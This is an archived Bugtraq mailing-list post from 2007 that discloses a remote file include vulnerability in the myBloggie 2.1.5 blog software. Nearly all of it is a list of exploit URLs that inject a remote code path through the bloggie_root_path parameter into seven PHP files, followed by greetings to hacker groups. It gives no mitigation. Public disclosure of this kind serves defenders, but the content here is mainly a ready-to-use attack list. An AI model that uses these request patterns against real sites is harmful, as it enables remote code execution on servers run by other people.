lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070609170839.14271.qmail@securityfocus.com> Date: 9 Jun 2007 17:08:39 -0000 From: yaser@...cturk.net To: bugtraq@...urityfocus.com Subject: myBloggie 2.1.5 Remote File Include ######################################################################### # # myBloggie 2.1.5 RFI # # Author: Yaser <yaser@...cturk.net> # # Homepage: http://www.ayyildiz.org # ######################################################################### ######################################################################### # Download S : http://mywebland.com/download.php?id=19 # # Exploits: # # http://site/config.php?bloggie_root_path=evilcode? # http://site/includes/db.php?bloggie_root_path=evilcode? # http://site/includes/template.php?bloggie_root_path=evilcode? # http://site/includes/functions.php?bloggie_root_path=evilcode? # http://site/includes/classes.php?bloggie_root_path=evilcode? # http://site/viewmode.php.php?bloggie_root_path=evilcode? # http://site/blog_body.php?bloggie_root_path=evilcode? # ######################################################################### Thanks: H0tturk - ir4dex - ht08 - ajann - GencTurk - Zakix - Devil Hacker Referance: www.h0tturk.com and Stefan Esser